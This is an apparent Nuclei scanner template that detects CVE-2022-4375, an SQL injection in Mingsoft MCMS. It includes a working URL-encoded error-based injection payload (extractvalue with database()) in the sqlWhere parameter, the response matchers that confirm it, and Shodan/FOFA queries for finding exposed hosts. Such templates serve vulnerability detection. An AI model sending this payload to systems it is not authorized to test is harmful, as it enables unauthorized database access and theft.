id: CVE-2022-4375

info:
  name: Mingsoft MCMS - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or update to the latest version.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I61TG5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4375
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4375
    cwe-id: CWE-89,CWE-707
    epss-score: 0.26228
    epss-percentile: 0.96398
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2022,mingsoft,mcms,sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "mingsoft.net"
        internal: true

  - raw:
      - |
        POST /cms/category/list? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "java.sql.SQLSyntaxErrorException"
          - "java.sql.SQLException"
        condition: or

      - type: word
        part: body
        words:
          - "Icategorydao.xml"
          - "cms_category"
        condition: or

      - type: status
        status:
          - 500
          - 200
# digest: 490a004630440220211b578d4c88cfb2aeb32471a7bb044486ce8b99ca35423fdd987ca4227436fd0220032eb0237aba96254dcb0eff7141017d5de56ab70be1fa6903d0b16457bb88af:922c64590222798bb761d5b6d8e72950